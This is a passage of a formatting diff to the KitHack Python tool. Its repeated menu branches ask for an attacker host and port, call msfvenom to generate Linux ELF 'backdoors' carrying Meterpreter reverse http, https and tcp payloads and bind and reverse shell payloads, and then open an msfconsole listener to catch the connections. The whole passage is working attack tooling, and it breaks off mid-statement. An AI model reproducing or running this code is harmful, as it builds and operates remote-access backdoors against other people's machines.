"\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_http; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter_reverse_http; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] AN ERROR HAS OCCURED WHILST GENERATING THE PAYLOAD\n".format( - RED - ) - ) + "{}[X] AN ERROR HAS OCCURED WHILST GENERATING THE PAYLOAD\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -1466,55 +1134,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_https LHOST={0} LPORT={1} -f elf > output/{2}.elf".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_https LHOST={0} LPORT={1} -f elf > output/{2}.elf" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.elf".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_https; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter_reverse_https; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -1524,55 +1182,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.elf".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter_reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -1582,55 +1230,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.elf".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter/reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter/reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -1640,55 +1278,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p linux/x64/shell_bind_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p linux/x64/shell_bind_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.elf".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/shell_bind_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/shell_bind_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/shell_bind_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -1698,55 +1326,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p linux/x64/shell_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p linux/x64/shell_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.elf".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/shell_reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/shell_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/shell_reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -1756,55 +1374,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p linux/x86/meterpreter_reverse_http LHOST={0} LPORT={1} -f elf > output/{2}.elf".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p linux/x86/meterpreter_reverse_http LHOST={0} LPORT={1} -f elf > output/{2}.elf" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.elf".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_http; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter_reverse_http; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -1814,55 +1422,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p linux/x86/meterpreter_reverse_https LHOST={0} LPORT={1} -f elf > output/{2}.elf".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p linux/x86/meterpreter_reverse_https LHOST={0} LPORT={1} -f elf > output/{2}.elf" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.elf".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_https; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter_reverse_https; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -1872,55 +1470,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.elf".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter_reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -1930,55 +1518,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.elf".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter/reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter/reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -1988,55 +1566,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p linux/x86/shell_bind_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p linux/x86/shell_bind_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.elf".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, 